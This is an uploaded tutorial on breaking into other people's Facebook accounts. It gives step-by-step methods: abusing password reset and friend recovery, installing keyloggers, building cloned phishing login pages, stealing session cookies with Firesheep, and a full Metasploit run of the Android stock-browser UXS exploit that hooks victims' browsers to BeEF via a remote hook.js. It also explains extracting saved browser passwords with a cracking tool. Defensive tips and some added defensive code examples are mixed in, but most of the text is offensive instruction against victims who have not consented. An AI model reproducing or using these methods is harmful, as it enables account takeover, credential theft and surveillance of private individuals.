
Hacking Facebook Accounts: Latest Versions Even Before They're Ready

This document discusses various methods that hackers use to gain unauthorized access to Facebook accounts without the owner's consent or knowledge. These methods include resetting the password by guessing security questions, using software or hardware keyloggers to steal login credentials, creating fake phishing login pages, stealing browser cookies on public Wi-Fi to gain access to an active account, and exploiting flaws in Android browsers. The author provides steps for each method and also offers tips on how account owners can better protect themselves.

Uploaded by

Sơn Vương

HACKING FACEBOOK ACCOUNTS
We share our lives on Facebook. We share our birthdays and our
anniversaries. We share our vacation plans and locations. We share
the births of our sons and the deaths of our fathers. We share our
most cherished moments and our most painful thoughts. We divulge
every aspect of our lives. We even clamor to see the latest versions
even before they're ready for primetime.
But we sometimes forget who's watching.
We use Facebook as a tool to connect, but there are those people
who use that connectivity for malicious purposes. We reveal what
others can use against us. They know when we're not home and for
how long we're gone. They know the answers to our security
questions. People can practically steal our identities—and that's just
with the visible information we purposely give away through our public
Facebook profile.
The scariest part is that as we get more comfortable with advances in
technology, we actually become more susceptible to hacking. As if we
haven't already done enough to aid hackers in their quest for our data
by sharing publicly, those in the know can get into our emails and
Facebook accounts to steal every other part of our lives that we
intended to keep away from prying eyes.
In fact, you don't even have to be a professional hacker to get into
someone's Facebook account.

It can be as easy as running Firesheep on your computer for a few
minutes. In fact, Facebook actually allows people to get into someone
else's Facebook account without knowing their password. All you have
to do is choose three friends to send a code to. You type in the three
codes, and voilà—you're into the account. It's as easy as that.
In this article I'll show you these, and a couple other ways that hackers
(and even regular folks) can hack into someone's Facebook account.
But don't worry, I'll also show you how to prevent it from happening to
you.
Method 1: Reset the Password
The easiest way to "hack" into someone's Facebook is through
resetting the password. This is easier for people who are
friends with the person they're trying to hack.
• The first step would be to get your friend's Facebook email login.
If you don't already know it, try looking on their Facebook page in
the Contact Info section.
• Next, click on Forgotten your password? and type in the
victim's email. Their account should come up. Click This is my
account.
• It will ask if you would like to reset the password via the victim's
emails. This doesn't help, so press No longer have access to
these?
• It will now ask How can we reach you? Type in an email that
you have that also isn't linked to any other Facebook account.
• It will now ask you a question. If you're close friends with the
victim, that's great. If you don't know too much about them, make
an educated guess. If you figure it out, you can change the
password. Now you have to wait 24 hours to log in to their
account.
• If you don't figure out the question, you can click on Recover
your account with help from friends. This allows you to
choose between three and five friends.
• It will send them passwords, which you may ask them for, and
then type into the next page. You can either create three to five
fake Facebook accounts and add your friend (especially if they
just add anyone), or you can choose three to five close friends of
yours that would be willing to give you the password.
How to Protect Yourself
• Use an email address specifically for your Facebook and don't
put that email address on your profile.
• When choosing a security question and answer, make it difficult.
Make it so that no one can figure it out by simply going through
your Facebook. No pet names, no anniversaries—not even third
grade teacher's names. It's as easy as looking through a
yearbook.
• Learn about recovering your account from friends. You can
select the three friends you want the password sent to. That way
you can protect yourself from a friend and other mutual friends
ganging up on you to get into your account.

Method 2: Use a Keylogger


Software Keylogger
A software keylogger is a program that can record each stroke on the
keyboard that the user makes, most often without their knowledge.
The software has to be downloaded manually on the victim's
computer. It will automatically start capturing keystrokes as soon as
the computer is turned on and remain undetected in the background.
The software can be programmed to send you a summary of all the
keystrokes via email.
CNET has Free key logger, which as the title suggests, is free. If this
isn't what you're looking for, you can search for other free keyloggers
or pay for one.

Hardware Keylogger
These work the same way as the software keylogger, except that a
USB drive with the software needs to be connected to the victim's
computer. The USB drive will save a summary of the keystrokes, so
it's as simple as plugging it to your own computer and extracting the
data. You can look through Keelog for prices, but it's a bit higher than
buying the software since you have to buy the USB drive with the
program already on it.
How to Protect Yourself
• Use a firewall. Keyloggers usually send information through the
internet, so a firewall will monitor your computer's online activity
and sniff out anything suspicious.
• Install a password manager. Keyloggers can't steal what you
don't type. Password managers automatically fill out important
forms without you having to type anything in.
• Update your software. Once a company knows of any exploits in
their software, they work on an update. Stay behind and you
could be susceptible.
• Change passwords. If you still don't feel protected, you can
change your password bi-weekly. It may seem drastic, but it
renders any information a hacker stole useless.

Method 3: Phishing
This option is much more difficult than the rest, but it is also the most
common method to hack someone's account. The most popular type
of phishing involves creating a fake login page. The page can be sent
via email to your victim and will look exactly like the Facebook login
page. If the victim logs in, the information will be sent to you instead of
to Facebook. This process is difficult because you will need to create
a web hosting account and a fake login page.
The easiest way to do this would be to clone the website to make an
exact copy of the Facebook login page. Then you'll just need to tweak
the submit form to copy / store / email the login details a victim enters.
Users are very careful now with logging into Facebook through other
links, though, and email phishing filters are getting better every day,
so that only adds to this already difficult process. But, it's still possible,
especially if you clone the entire Facebook website.
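
Because a cloned page looks identical, the reliable signal is the address the login form is served from. The following is an added example, not part of the original document: a link check a mail filter or browser helper could apply, assuming facebook.com and its subdomains are the only legitimate login hosts; the sample links are constructed.

```python
from urllib.parse import urlsplit

# Assumption for this example: facebook.com and its subdomains are the only
# hosts that should ever receive the login form.
TRUSTED_DOMAIN = "facebook.com"


def check_login_link(url):
    """Return (ok, reason) for a link that claims to open the Facebook login."""
    parts = urlsplit(url.strip())
    if parts.scheme != "https":
        return False, "not https"
    if parts.username is not None or parts.password is not None:
        # In https://facebook.com@other.example/ the real host is other.example.
        return False, "userinfo before host"
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return False, "no host"
    labels = host.split(".")
    if not host.isascii() or any(lab.startswith("xn--") for lab in labels):
        # Internationalised labels can render like Latin letters.
        return False, "non-ASCII or punycode host"
    if host == TRUSTED_DOMAIN or host.endswith("." + TRUSTED_DOMAIN):
        return True, "ok"
    return False, "host is not under " + TRUSTED_DOMAIN


# Constructed sample links (example hosts and a documentation IP address).
SAMPLES = [
    "https://www.facebook.com/login.php",
    "http://www.facebook.com/login.php",
    "https://facebook.com.account-check.example/login.php",
    "https://facebook.com@203.0.113.5/login.php",
    "https://faceb00k.example/login.php",
    "https://xn--facebok-y0a.example/login.php",
]

if __name__ == "__main__":
    for link in SAMPLES:
        print(check_login_link(link), link)
```

Only the first sample passes; each of the others fails on a different rule, which is the point of checking scheme, userinfo and host separately rather than searching the URL for the string "facebook.com".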

Method 4: Stealing Cookies


Cookies allow a website to store information on a user's hard drive
and later retrieve it. These cookies contain important information used
to track a session that a hacker can sniff out and steal if they are on
the same Wi-Fi network as the victim. They don't actually get the login
passwords, but they can still access the victim's account by cloning
the cookies, tricking Facebook into thinking the hacker's browser is
already authenticated.
Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi
connection. It collects the cookies and stores them in a tab on the side
of the browser.
From there, the hacker can click on the saved cookies and access the
victim's account, as long as the victim is still logged in. Once the victim
logs out, it is impossible for the hacker to access the account.
A Couple More Facebook Hacks
For those with a bit more technical skill, check out the Same Origin
Policy Facebook Hack and the somewhat easier, Facebook Password
Extractor. We will continue to add more Facebook hacks in the near
future, so keep coming back here.

How to Protect Yourself


• On Facebook, go to your Account Settings and check under
Security. Make sure Secure Browsing is enabled. Firesheep
can't sniff out cookies over encrypted connections like HTTPS,
so try to steer away from HTTP.
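
On the server side, the same protection shows up in the response headers: a session cookie marked Secure is never sent over plain HTTP, and Strict-Transport-Security keeps the browser on HTTPS. The following added example (not part of the original document) audits a response for those settings; the header samples are constructed.

```python
import re

# Constructed sample response headers for this example (not captured traffic).
WEAK_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session_id=abc123; Path=/; HttpOnly
Set-Cookie: locale=en_US; Path=/; Secure
Set-Cookie: auth=xyz789; Path=/; Secure; HttpOnly; SameSite=Lax
"""

HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: session_id=abc123; Path=/; Secure; HttpOnly; SameSite=Lax
"""


def parse_set_cookie(value):
    """Split one Set-Cookie value into (name, {lower-cased attribute: value})."""
    first, *attrs = value.split(";")
    name = first.strip().partition("=")[0]
    flags = {}
    for attr in attrs:
        key, _, val = attr.strip().partition("=")
        if key:
            flags[key.lower()] = val.strip()
    return name, flags


def audit_response(raw_headers):
    """Return [(cookie name or '<response>', [missing protections])]."""
    findings, hsts_on = [], False
    for line in raw_headers.splitlines():
        field, sep, value = line.partition(":")
        if not sep:
            continue  # status line or blank line
        field, value = field.strip().lower(), value.strip()
        if field == "strict-transport-security":
            m = re.search(r"max-age\s*=\s*\"?(\d+)", value, re.I)
            hsts_on = bool(m) and int(m.group(1)) > 0  # max-age=0 disables HSTS
        elif field == "set-cookie":
            name, flags = parse_set_cookie(value)
            # Secure: never sent over plain HTTP, so a Wi-Fi sniffer cannot see it.
            # HttpOnly: not readable by script running in the page.
            missing = [f for f in ("secure", "httponly") if f not in flags]
            if missing:
                findings.append((name, missing))
    if not hsts_on:
        findings.append(("<response>", ["strict-transport-security"]))
    return findings


if __name__ == "__main__":
    print(audit_response(WEAK_RESPONSE))
    print(audit_response(HARDENED_RESPONSE))
```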

It's important to note here that each hack I'll be covering is very
specific. I have said it before, but I feel I need to repeat it again: there
is NO SILVER BULLET that works under all circumstances.
Obviously, the good folks at Facebook have taken precautions to
make certain that their app is not hacked, but if we are creative,
persistent, and ingenious, we can still get in.
Facebook is one of the most secure applications on the Internet and,
despite what you might read on the Internet, it is NOT easy to hack. In
addition, most of those websites on the Internet willing to sell you a
Facebook hack are scams. Don't give them a penny!

In some cases, we might get the password which, of course, will give
us full access to the Facebook account. In other cases, we might just
get access to the account without any rights. In still other schemes, we
might get the cookies that Facebook places in the user's browser and
then place it in our browser for access to the account whenever we
please. In yet another scenario, we can place ourselves between the
user and Facebook in a form of MitM attack, to get the password, etc.

Here I will use a flaw in the stock Android web browser that will
provide us with access to the Facebook account. I hope it goes
without saying that this hack will only work when the user has
accessed their Facebook account from the stock Android browser, not
the Facebook mobile app. Although Google is aware of this security
flaw in their browser, it is not automatically patched or replaced on
existing systems. As a result, this hack will work on most Android
systems.

Same Origin Policy


Same-origin policy (SOP) is one of the key security measures that
every browser should enforce. It means that script running in a page
from one origin (scheme, host, and port) cannot read or modify content
that belongs to a different origin. This prevents an attacker's page from
running code against another website without that site's authorization.

Unfortunately, the default Android browser can be hacked as it does
not enforce the SOP policy adequately. In this way, an attacker can
access the user's other pages that are open in the browser, among
other things. This means that if we can get the user to navigate to our
website and then send them some malicious code, we can then
access other sites that are open in their browser, such as Facebook.
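
What a browser that enforces SOP correctly decides can be written down as a comparison of origins. This is an added example, not part of the original document; the URLs are constructed, and the function models only the scheme/host/port comparison, not the rest of a browser's cross-origin rules.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) origin of a URL, or None if opaque."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None  # data:, file:, about:blank and similar get an opaque origin
    port = parts.port if parts.port is not None else DEFAULT_PORTS[parts.scheme]
    return (parts.scheme, parts.hostname, port)


def sop_decision(script_page, target_page):
    """Say whether script in script_page may read target_page, and why."""
    a, b = origin(script_page), origin(target_page)
    if a is None or b is None:
        return "blocked: opaque origin"
    for name, x, y in zip(("scheme", "host", "port"), a, b):
        if x != y:
            return "blocked: %s differs (%s vs %s)" % (name, x, y)
    return "allowed: same origin"


# Constructed cases: (page running the script, page it tries to read).
CASES = [
    ("https://www.facebook.com/home", "https://www.facebook.com/messages"),
    ("https://www.facebook.com:443/", "https://www.facebook.com/"),
    ("http://attacker.example:8080/", "https://www.facebook.com/"),
    ("https://m.facebook.com/", "https://www.facebook.com/"),
    ("https://www.facebook.com:8443/", "https://www.facebook.com/"),
    ("data:text/html,hi", "https://www.facebook.com/"),
]

if __name__ == "__main__":
    for script_page, target_page in CASES:
        print(sop_decision(script_page, target_page), "|", script_page)
```

The third case is the situation this section describes: a page from another site trying to reach an open Facebook tab, which a correct SOP implementation blocks.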
I recommend that you start by installing Kali Linux. In this hack, we will
need two tools, Metasploit and BeEF, both of which are built into our
Kali Linux system.

Step 1: Open Metasploit


Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.

Step 2: Find the Exploit


Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Info
Now that we have loaded the module, let's get some information on
this module. We can do this by typing:
msf > info
As you can see from this info page, this exploit works against all stock
Android browsers before Android 4.4 KitKat. It tells us that this module
allows us to run arbitrary JavaScript in the context of the URL.

Step 4: Show Options


Next, let's see what options we need to set for this module to function.
Most importantly, we need to set the REMOTE_JS that I have
highlighted below.
Step 5: Open BeEF
Now, open BeEF. Please take a look at this tutorial on using BeEF, if
you are unfamiliar with the tool.
Step 6: Set JS to BeEF Hook
Back to Metasploit now. We need to set the REMOTE_JS to the hook
on BeEF. Of course, make certain you use the IP of the server that
BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /

Step 7: Run the Server


Now we need to start the Metasploit web server. What will happen
now is that Metasploit will start its web server and serve up the BeEF
hook so that when anyone navigates to that website, it will have their
browser hooked to BeEF.
msf > run

Step 8: Navigate to the Website from an Android Browser


Now we are replicating the behavior of the victim. When they navigate
to the website hosting the hook, it will automatically inject the
JavaScript into their browser and hook it. So, we need to use the stock
browser on an Android device and go to 192.168.1.107:8080, or
whatever the IP is of your website.

Step 9: Hook Browser


When the user/device visits our web server at 192.168.1.107, the
BeEF JavaScript will hook their browser. It will show under the
"Hooked Browser" explorer in BeEF. We now control their browser!

Step 10: Detect if the Browser Is Authenticated to Facebook


Now let's go back to BeEF and go to the "Commands" tab. Under the
"Network" folder we find the "Detect Social Networks" command. This
command will check to see whether the victim is authenticated to
Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower
right.
When we do so, BeEF will return for us the results. As you can see
below, BeEF returned to us that this particular user was not
authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to
Facebook and attempt this command again. Once they have
authenticated to Facebook, we can direct a tab to open the user's
Facebook page, which we will do in our next Facebook hack tutorial.
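
Seen from a site operator's side, the version boundary given in Step 3 (stock Android browsers before Android 4.4 KitKat) can be checked against the site's own access logs, so that those visitors can be told to switch browsers. This is an added example, not part of the original document; the User-Agent heuristic, the log format and the sample lines are assumptions constructed for illustration.

```python
import re

# Boundary taken from the module info quoted in Step 3: stock browsers on
# Android releases before 4.4 are affected.
FIXED_IN = (4, 4)
ANDROID_RE = re.compile(r"Android (\d+)\.(\d+)")
# The last quoted field of a combined-format access log line is the User-Agent.
LOG_RE = re.compile(r'^(\S+) .*"([^"]*)"\s*$')


def stock_android_version(user_agent):
    """Return (major, minor) if the UA looks like the stock browser, else None.

    Assumed heuristic: stock browser UAs carry "Android x.y", "Version/" and
    "Safari/" but no other browser token such as "Chrome/".
    """
    m = ANDROID_RE.search(user_agent)
    if not m or "Version/" not in user_agent or "Safari/" not in user_agent:
        return None
    if any(tok in user_agent for tok in ("Chrome/", "Firefox/", "OPR/")):
        return None
    return int(m.group(1)), int(m.group(2))


def affected_clients(log_lines):
    """Return [(client address, 'major.minor')] for affected stock browsers."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        version = stock_android_version(m.group(2))
        if version is not None and version < FIXED_IN:
            hits.append((m.group(1), "%d.%d" % version))
    return hits


# Constructed log data (documentation addresses, made-up requests).
_AGENTS = [
    ("192.0.2.10", "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; GT-I9300 "
     "Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 "
     "Mobile Safari/534.30"),
    ("192.0.2.11", "Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K) "
     "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 "
     "Mobile Safari/537.36"),
    ("192.0.2.12", "Mozilla/5.0 (Linux; Android 4.4.2; Nexus 5 Build/KOT49H) "
     "AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 "
     "Mobile Safari/537.36"),
    ("192.0.2.13", "Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 "
     "Firefox/36.0"),
]
SAMPLE_LOG = [
    '%s - - [10/Mar/2015:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "%s"' % a
    for a in _AGENTS
]

if __name__ == "__main__":
    print(affected_clients(SAMPLE_LOG))
```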

One of the cardinal rules of hacking is: "If I can get physical access to
the computer... GAME OVER!" This means that if I were given even
just a few moments with the machine itself, I can hack anything I want
from that computer—including Facebook passwords.
I recognize that not all of you are technically savvy, though that
doesn't mean you can't be with some hard work. So this Facebook
hack is for those of you without either the technical savvy or the work
ethic to become so. All you need is a moment or two of unfettered
physical access to the target's computer and you can easily have their
Facebook password.

Remember Me?
This hack relies upon the fact that most of us want websites to
remember us when we return. We don't want to put in our username
and password every time we want to access the site, so we tell the
browser to "Remember me." In that way, we don't need to
re-authenticate and provide our password; our system simply remembers
it and provides it to the website.
Of course, those passwords must be stored somewhere on our
computer. The key is to know where those passwords are stored and
how to crack the hashed passwords when we find them. For instance,
Mozilla stores the user's passwords at:
c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/**.default/cache2/entries
As you can see in the screenshot below, I have displayed that
directory and password hashes from a Windows 7 computer running
Firefox 36. These are all the saved passwords from various websites
that Firefox has stored.

Note that the location of these passwords is in different places for
each browser and sometimes in different places on different operating
systems with the same browser.

Elcomsoft's Facebook Password Extraction Tool


Fortunately for us, there is a company in Russia named Elcomsoft.
This company employs first-rate cryptographers and they develop and
sell software to crack various password encryption schemes. (As a
side note, a cryptographer from Elcomsoft was the first person
arrested and prosecuted under the DMCA when he came to the U.S.
for a conference. He was eventually acquitted.)
Their software is listed as digital forensic tools, but they can just as
easily be used for hacking purposes. One of their tools was used for
the iCloud hack that revealed nude photos of Jennifer Lawrence and
other Hollywood stars in August 2014.
Elcomsoft developed a Windows tool named Facebook Password
Extractor (FPE, for short) that extracts the user's Facebook password
from its location on the user's system (the user must have used the
"Remember me" feature) and then cracks it. Of course, we need
physical access to the system to do this in most cases. Alternatively, if
we can hack their system, we could upload this tool to the target
system and then use it or we could simply download the user's
browser password file and use this tool locally on our system.
You can download this free tool from Elcomsoft’s website, which
officially supports the following web browsers (though it may work on
newer versions).
• Microsoft Internet Explorer (up to IE9)
• Mozilla Firefox (up to Firefox 4)
• Apple Safari (up to Safari 5)
• Opera (up to Opera 11)
• Google Chrome (up to Chrome 11)
The process of using this tool is almost idiot-proof. (Almost a
requirement for Facebook hacking, wouldn't you agree?) You simply
install it on the system whose Facebook password you want to extract
and it does everything else.

One of the drawbacks to using this tool is that Elcomsoft released it
back in 2011 and it has not been updated since.
